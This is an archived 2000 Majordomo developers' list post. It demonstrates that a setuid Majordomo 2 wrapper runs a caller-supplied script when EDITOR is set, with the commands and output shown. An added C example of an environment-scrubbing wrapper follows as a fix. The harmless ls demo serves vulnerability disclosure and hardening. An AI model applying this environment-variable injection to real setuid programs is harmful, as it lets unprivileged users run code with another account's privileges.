Great Circle Associates Majordomo-Workers
(August 2000)
 


Subject: demonstration: setuid wrappers are insecure?
From: SRE <eckert @ climber . org>
Date: Mon, 28 Aug 2000 17:04:38 -0700
To: majordomo-workers @ GreatCircle . COM, mj2-dev @ csf . colorado . edu
In-reply-to: <ufak8d1v75x.fsf@epithumia.math.uh.edu>
References: <Dave Hayes's message of "Mon, 28 Aug 2000 01:30:39 -0700"><200008280830.BAA26974@hokkshideh.jetcafe.org>

At 06:36 AM 8/28/00, Jason L Tibbitts III wrote:
>Then any setuid executable at all is vulnerable, and sanitizing the
>environment isn't going to help because you have exploited the linker, not
>our code.  This is the explanation I've received several times; please show
>me how it is wrong if it is wrong.

OK, I looked at setting the environment variable PERL5LIB to replace one
of the Majordomo modules, but Perl traps setuid scripts (and apparently
notices that it's a setuid wrapper running the Mj2 scripts) so that fails.

Then, after a minute or two, I thought of this non-malicious change:

% echo '/bin/ls -l /usr/local/majordomo/bin' > /home/usr/eckert/tryme
% chmod 777 /home/usr/eckert/tryme
% setenv EDITOR /home/usr/eckert/tryme
% /usr/local/majordomo/bin/mj_shell -p XXX configedit GLOBAL
total 196
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_confirm
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_email
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_enqueue
-r-xr-xr-x  1 mdomo  lists  21945 Aug  9 18:40 mj_queuerun
-r-xr-xr-x  1 mdomo  lists   7610 Aug  9 18:40 mj_queueserv
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_shell
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_shutdown
-r-xr-xr-x  1 mdomo  lists   4133 Aug  9 18:40 mj_trigger
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_wwwadm
-r-s--s--x  1 mdomo  lists   8808 Aug  9 21:35 mj_wwwusr
File unchanged; not executing.

Note that mj_shell is now executing my shell script instead of
running an editor. Oops, but no big deal. One can only guess
whether other things are possible, but given how easy this one
was to find and demonstrate, I'm guessing others will find others!

OK, so I got Mj2 to replace a command with my own shell script by
passing the hard path to the shell script as an environment variable.
I'm not saying THIS example is dangerous, but given one example of
an environment variable that replaces the configedit command with
a shell script I wrote as an unprivileged user, isn't it POSSIBLE
that there are worse exploits out there waiting?

I'm still not saying we need to change the wrappers, I'm just
responding to the request for a demonstration. I didn't exploit
the linker, the operating system, or the wrapper, I directly
exploited our (Mj2) perl code (Majordomo.pm). If you were to toss
the environment in the wrapper, this wouldn't be possible. Greater
minds than mine can debate whether that needs to be addressed.

SRE

mailto:eckert@climber.org | http://www.climber.org/eckert/
Info on peak climbing email lists mailto:info@climber.org

"A free society is one where it is safe to be unpopular."
   -- Adlai Stevenson
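Added example, not Majordomo's own wrapper code: a minimal setuid wrapper that discards the caller's environment (EDITOR, PATH, PERL5LIB, IFS and everything else not on a short allowlist) before exec'ing the privileged script, which is the "toss the environment in the wrapper" change the message describes. The target path and the allowlist are assumptions.

```c
/* Setuid wrapper that execs its target with a rebuilt environment.
 * Everything inherited from the caller is dropped except allowlisted
 * names; PATH and IFS are always set to fixed values. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define MAX_ENV 16
extern char **environ;

/* Hypothetical target; the real script path is site-specific. */
static const char *TARGET = "/usr/local/majordomo/bin/mj_shell.pl";

/* Names the wrapped script legitimately needs (assumed list).
 * EDITOR is deliberately absent, so the caller cannot supply it. */
static const char *ALLOWED[] = { "TERM", "LANG", NULL };

/* Copy allowlisted entries from in[] into out[], after the fixed
 * entries. Returns the entry count; out[] is NULL-terminated. */
int build_clean_env(char *const in[], char *out[], size_t max)
{
    size_t n = 0;
    out[n++] = "PATH=/usr/bin:/bin";   /* fixed, never caller-controlled */
    out[n++] = "IFS= \t\n";            /* reset for any shell the script spawns */
    for (size_t i = 0; in[i] != NULL && n < max - 1; i++) {
        const char *eq = strchr(in[i], '=');
        if (eq == NULL)
            continue;                   /* malformed entry: drop it */
        size_t len = (size_t)(eq - in[i]);
        for (const char **a = ALLOWED; *a != NULL; a++)
            if (strlen(*a) == len && strncmp(*a, in[i], len) == 0)
                out[n++] = in[i];
    }
    out[n] = NULL;
    return (int)n;
}

/* 1 if a variable called name is present in env[], else 0. */
int env_has(char *const env[], const char *name)
{
    size_t len = strlen(name);
    for (size_t i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], name, len) == 0 && env[i][len] == '=')
            return 1;
    return 0;
}

int main(int argc, char *argv[])
{
    char *env[MAX_ENV];
    (void)argc;
    build_clean_env(environ, env, MAX_ENV);
    if (setuid(geteuid()) != 0) { perror("setuid"); return 1; }
    argv[0] = (char *)TARGET;
    execve(TARGET, argv, env);          /* only returns on failure */
    perror("execve");
    return 1;
}
```

This closes the EDITOR path shown above; it does not replace Perl's taint checks or argument validation inside the scripts themselves.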